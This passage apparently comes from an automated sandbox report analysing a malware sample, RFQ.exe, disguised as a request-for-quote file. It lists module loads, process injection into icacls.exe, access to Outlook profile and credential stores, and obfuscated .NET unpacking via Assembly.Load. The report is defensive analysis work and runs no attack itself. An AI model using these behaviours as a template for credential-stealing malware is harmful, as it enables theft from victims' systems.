            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\RFQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: RFQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: icacls.pdb source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000002.4431445445.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KdNqCjDpwdLOuI.exe, 00000007.00000002.4431314458.00000000008FE000.00000002.00000001.01000000.0000000D.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431191705.00000000008FE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2157292356.0000000003553000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2159010272.0000000003709000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: icacls.pdbGCTL source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000002.4431445445.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ.exe, RFQ.exe, 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, icacls.exe, 00000008.00000003.2157292356.0000000003553000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2159010272.0000000003709000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFwJa0tHHWnjMMhMVc.cs.Net Code: ufQDpZk6jv System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFwJa0tHHWnjMMhMVc.cs.Net Code: ufQDpZk6jv System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ.exe.2c801f4.7.raw.unpack, SQL.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ.exe.73c0000.10.raw.unpack, SQL.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_077BB3BF push ecx; ret 0_2_077BB3C4
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00417948 push edi; retf 5_2_00417956
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0041C155 push edx; iretd 5_2_0041C156
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00417904 push edi; retf 5_2_00417956
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0041E2FB push B2CD0983h; ret 5_2_0041E301
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0040CBF6 push eax; ret 5_2_0040CBF7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00403397 push ebx; retf 5_2_00403398
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0040CB98 push ecx; iretd 5_2_0040CBDC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0040857A push eax; ret 5_2_00408585
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00415DA1 push eax; iretd 5_2_00415DA3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00403730 push eax; ret 5_2_00403732
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A0225F pushad ; ret 5_2_01A027F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A027FA pushad ; ret 5_2_01A027F9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A309AD push ecx; mov dword ptr [esp], ecx5_2_01A309B6
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A0283D push eax; iretd 5_2_01A02858
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A01366 push eax; iretd 5_2_01A01369
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038B225F pushad ; ret 8_2_038B27F9
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038B27FA pushad ; ret 8_2_038B27F9
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038E09AD push ecx; mov dword ptr [esp], ecx8_2_038E09B6
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038B283D push eax; iretd 8_2_038B2858
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_038B1368 push eax; iretd 8_2_038B1369
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030D4215 push edi; retf 8_2_030D4223
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030D41D1 push edi; retf 8_2_030D4223
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030D266E push eax; iretd 8_2_030D2670
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030DABC8 push B2CD0983h; ret 8_2_030DABCE
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030D8A22 push edx; iretd 8_2_030D8A23
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030DEE37 push FFFFFFE1h; iretd 8_2_030DEE3D
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030C4E47 push eax; ret 8_2_030C4E52
            Source: RFQ.exeStatic PE information: section name: .text entropy: 7.793030920225636
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, LkAyc0idf21VLf6Xau.csHigh entropy of concatenated method names: 'q5CP4UF8vt', 'kpvPa7CHqx', 'zpvPmMBWf0', 'mP3PRg0IJG', 'GwePbl28fh', 'rw2PZCvJym', 'tGbPJ3qnby', 'IjUPfUVILp', 'JvUPoW8kBn', 'SVnPHTEKkt'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, eBGAyCGunGP3UOaY7n.csHigh entropy of concatenated method names: 'kQUpwdvUn', 'S22VY6L4W', 'Lj91v3YWU', 'Te5lIR8fX', 'GD0IKFPGn', 'qJO7a29qy', 'XWxlrOl96S61IAVNJF', 'YWuaLjWwimCnGYyplx', 'iD6PM5YST', 'bvxF2fUTv'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, c8U9sqDpsUn1IJSW9W.csHigh entropy of concatenated method names: 'pRVbgaqGcE', 'FCxbkgco0H', 'Lnrb6LXZD6', 'ToString', 'QrObN3MlW5', 'r4ab8clxmT', 'KU2RJB3SmyJ1pMqiPTn', 'EIhiqm3ltXeUvsoaAi6'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, VU8OU0cVco9Og8khpl.csHigh entropy of concatenated method names: 'CY2ZTR9SST', 'HR9ZhCtt8v', 'MjfZpBW0Po', 'N7yZV7fZLg', 'MGrZyOU6Da', 'yPlZ13aGng', 'IgUZlyko24', 'PanZvcBmeA', 'F4KZICPFH6', 'C0PZ7iPYgJ'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, nIySLGYFvTuG6wb35P.csHigh entropy of concatenated method names: 'WptZ4bLxeR', 'AiHZmHBj4J', 'LM4ZbonUcn', 'GoUb3Z9Oq4', 'Hy7bzLajDH', 'Db0Z9q78Eb', 'C1oZ5WLfa2', 'JAIZqj1AtN', 'W64ZS4OaNu', 'oOEZD0D0Y1'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, OmoVjUKcy812NDeOQq.csHigh entropy of concatenated method names: 'SeFW5ZI1q1', 'xNAWSSnTtC', 'h0SWDCMwXM', 'vtGW4s5WgZ', 'uo1WatLAaU', 'XeOWRXviDZ', 'HLVWbd0Kme', 'zbjP8e6jxb', 'biUPYKiqAN', 'Y05Pxd4r5I'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFwJa0tHHWnjMMhMVc.csHigh entropy of concatenated method names: 'eixSMSkjXg', 'OFeS4dK9RA', 'EsFSaAe1H6', 'hHESmghSc4', 'DdbSRmu1F7', 'kAYSbI0FB7', 'vgZSZTNwYf', 'UUBSJUqr3r', 'u02SfBoGYn', 'DQCSoJqwoP'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, T97BXp9oYlX3XNAdPm.csHigh entropy of concatenated method names: 'RR9PUfiIcM', 'nn3PLmDxuE', 'z2dPdjolpO', 'EYsPj53Wsx', 'dxLPwwSLVq', 'otcPnkJkx2', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, nJZ4GEsGrv3FIxwXsr.csHigh entropy of concatenated method names: 'ToString', 'MNsQe6WjxG', 'YTiQL7hphp', 'MyMQdI1nAo', 'z6GQjcxL0V', 'OZIQngP4cA', 'yOLQ2GOJjC', 'zqbQsOargf', 'q8rQAuJ0Mx', 'BY8QEHiCvp'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, vEZuPi2EYG0fLTJDDE.csHigh entropy of concatenated method names: 'WlOCvU6cwe', 'kMICIn8COb', 'QVjCUqBmVq', 'PSeCLe2Eyw', 'acZCj8HqD3', 'niCCn9qpk2', 'duTCsraLIh', 'N3QCAYUkMx', 'oRnCBfH7sJ', 'ndZCe3lvn6'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFePlkmXblX4RY1BsP.csHigh entropy of concatenated method names: 'jBuaw1xVj2', 'fgVai6aIhl', 'mpGagq3mmZ', 'iJqakWKXhl', 'MJTa6SpJ1e', 'd00aNCuYno', 'oIpa86xVXk', 'SDjaYipa0E', 'LDbaxotXkH', 'osYa3ivyeB'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, KAoFYkWjroXWSWbPm1.csHigh entropy of concatenated method names: 'Dispose', 'PBD5xqrmjq', 'KoAqLhhT80', 'BQcOOUEfZ9', 'YqC53TkNaB', 'PxV5zRTQO0', 'ProcessDialogKey', 'aP4q9N64EA', 'jHiq5Xk0h5', 'm7ZqqVLNSc'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, GmcR91STTVDSo7dnv6x.csHigh entropy of concatenated method names: 'mW5WTO3bXh', 'cmDWhcgaVN', 'VcFWp6CCOx', 'cDxWVYZMhR', 'bMcWySncw8', 'QxvW1taqVX', 'hktWlLJrn8', 'HV1Wvs0hAb', 'j18WIUxuKs', 'iAKW7SrBAP'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, HlpFluUFTZEuqYseO3.csHigh entropy of concatenated method names: 'UHnbMSZU0R', 'qk2baRbb4v', 'lxobRYF6Sx', 'jjCbZOp6DT', 'qWabJmpryV', 'BOPR6c0VHR', 'GLKRNCbjxm', 'chER8f3rZ5', 'lNXRYKLwdd', 'kDbRxwIn1u'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, baw3pJlJ0E8HDbw7Va.csHigh entropy of concatenated method names: 'siadFk3hE8EGRcQng2b', 'dABJkF3LrP5qFM6kkqm', 'y4hbP2tCHN', 'tUcbWWdqms', 'qctbFnanYT', 'i7ouva3uqwGTUvV1MK8', 'LyZSji3H15vow5Gml0O'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, tX7h0O8HPDhXVPIY0I.csHigh entropy of concatenated method names: 'SLymVuZ77B', 'cgWm1PxWFO', 'A5wmvyk6My', 'UqnmIt0BBW', 'GvwmuWisaV', 'mAdmQFUIc9', 'BDEmKJghi7', 'gHpmPuYPys', 'MgtmW4bYWD', 'BRRmFLa3hr'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, j0dSf8SbSE5jx3q18CX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XGyFwbNSUN', 'pE6FiisZ6u', 'FSVFgodRhe', 'ImVFklsPKh', 'gS7F63k2Pf', 'L24FNlBKfL', 'sI5F8PH8Zu'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, LJJIfvh4QonUqcUNLk.csHigh entropy of concatenated method names: 'xwx5ZHbnvG', 'VTS5JYZUOn', 'lV35o68GFn', 'ujE5HZKbby', 'PTX5uohUBk', 'Wel5QnGJLO', 'JDLiStZDk5TgRSb1LT', 'BLXWK4gkbd0yf89fVH', 'X2h556h6kn', 'dcI5S1oyZA'
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, im0shl6YDE6ewhk7cM.csHigh entropy of concatenated method names: 'blFuBcgqkc', 'ft8uGEoOBe', 'N7ZuwyprWw', 'vT7uiEaUbv', 'nRQuLqPFXt', 'QOtud3oTJu', 'jL5ujf5TyN', 'fwbunnWQBr', 'KYVu269AIb', 'skhusaQ6fG'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, LkAyc0idf21VLf6Xau.csHigh entropy of concatenated method names: 'q5CP4UF8vt', 'kpvPa7CHqx', 'zpvPmMBWf0', 'mP3PRg0IJG', 'GwePbl28fh', 'rw2PZCvJym', 'tGbPJ3qnby', 'IjUPfUVILp', 'JvUPoW8kBn', 'SVnPHTEKkt'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, eBGAyCGunGP3UOaY7n.csHigh entropy of concatenated method names: 'kQUpwdvUn', 'S22VY6L4W', 'Lj91v3YWU', 'Te5lIR8fX', 'GD0IKFPGn', 'qJO7a29qy', 'XWxlrOl96S61IAVNJF', 'YWuaLjWwimCnGYyplx', 'iD6PM5YST', 'bvxF2fUTv'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, c8U9sqDpsUn1IJSW9W.csHigh entropy of concatenated method names: 'pRVbgaqGcE', 'FCxbkgco0H', 'Lnrb6LXZD6', 'ToString', 'QrObN3MlW5', 'r4ab8clxmT', 'KU2RJB3SmyJ1pMqiPTn', 'EIhiqm3ltXeUvsoaAi6'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, VU8OU0cVco9Og8khpl.csHigh entropy of concatenated method names: 'CY2ZTR9SST', 'HR9ZhCtt8v', 'MjfZpBW0Po', 'N7yZV7fZLg', 'MGrZyOU6Da', 'yPlZ13aGng', 'IgUZlyko24', 'PanZvcBmeA', 'F4KZICPFH6', 'C0PZ7iPYgJ'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, nIySLGYFvTuG6wb35P.csHigh entropy of concatenated method names: 'WptZ4bLxeR', 'AiHZmHBj4J', 'LM4ZbonUcn', 'GoUb3Z9Oq4', 'Hy7bzLajDH', 'Db0Z9q78Eb', 'C1oZ5WLfa2', 'JAIZqj1AtN', 'W64ZS4OaNu', 'oOEZD0D0Y1'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, OmoVjUKcy812NDeOQq.csHigh entropy of concatenated method names: 'SeFW5ZI1q1', 'xNAWSSnTtC', 'h0SWDCMwXM', 'vtGW4s5WgZ', 'uo1WatLAaU', 'XeOWRXviDZ', 'HLVWbd0Kme', 'zbjP8e6jxb', 'biUPYKiqAN', 'Y05Pxd4r5I'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFwJa0tHHWnjMMhMVc.csHigh entropy of concatenated method names: 'eixSMSkjXg', 'OFeS4dK9RA', 'EsFSaAe1H6', 'hHESmghSc4', 'DdbSRmu1F7', 'kAYSbI0FB7', 'vgZSZTNwYf', 'UUBSJUqr3r', 'u02SfBoGYn', 'DQCSoJqwoP'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, T97BXp9oYlX3XNAdPm.csHigh entropy of concatenated method names: 'RR9PUfiIcM', 'nn3PLmDxuE', 'z2dPdjolpO', 'EYsPj53Wsx', 'dxLPwwSLVq', 'otcPnkJkx2', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, nJZ4GEsGrv3FIxwXsr.csHigh entropy of concatenated method names: 'ToString', 'MNsQe6WjxG', 'YTiQL7hphp', 'MyMQdI1nAo', 'z6GQjcxL0V', 'OZIQngP4cA', 'yOLQ2GOJjC', 'zqbQsOargf', 'q8rQAuJ0Mx', 'BY8QEHiCvp'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, vEZuPi2EYG0fLTJDDE.csHigh entropy of concatenated method names: 'WlOCvU6cwe', 'kMICIn8COb', 'QVjCUqBmVq', 'PSeCLe2Eyw', 'acZCj8HqD3', 'niCCn9qpk2', 'duTCsraLIh', 'N3QCAYUkMx', 'oRnCBfH7sJ', 'ndZCe3lvn6'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFePlkmXblX4RY1BsP.csHigh entropy of concatenated method names: 'jBuaw1xVj2', 'fgVai6aIhl', 'mpGagq3mmZ', 'iJqakWKXhl', 'MJTa6SpJ1e', 'd00aNCuYno', 'oIpa86xVXk', 'SDjaYipa0E', 'LDbaxotXkH', 'osYa3ivyeB'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, KAoFYkWjroXWSWbPm1.csHigh entropy of concatenated method names: 'Dispose', 'PBD5xqrmjq', 'KoAqLhhT80', 'BQcOOUEfZ9', 'YqC53TkNaB', 'PxV5zRTQO0', 'ProcessDialogKey', 'aP4q9N64EA', 'jHiq5Xk0h5', 'm7ZqqVLNSc'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, GmcR91STTVDSo7dnv6x.csHigh entropy of concatenated method names: 'mW5WTO3bXh', 'cmDWhcgaVN', 'VcFWp6CCOx', 'cDxWVYZMhR', 'bMcWySncw8', 'QxvW1taqVX', 'hktWlLJrn8', 'HV1Wvs0hAb', 'j18WIUxuKs', 'iAKW7SrBAP'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, HlpFluUFTZEuqYseO3.csHigh entropy of concatenated method names: 'UHnbMSZU0R', 'qk2baRbb4v', 'lxobRYF6Sx', 'jjCbZOp6DT', 'qWabJmpryV', 'BOPR6c0VHR', 'GLKRNCbjxm', 'chER8f3rZ5', 'lNXRYKLwdd', 'kDbRxwIn1u'
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, baw3pJlJ0E8HDbw7Va.csHigh entropy of concatenated method names: 'siadFk3hE8EGRcQng2b', 'dABJkF3LrP5qFM6kkqm', 'y4hbP2tCHN', 'tUcbWWdqms', 'qctbFnanYT', 'i7ouva3uqwGTUvV1MK8', 'LyZSji3H15vow5Gml0O'
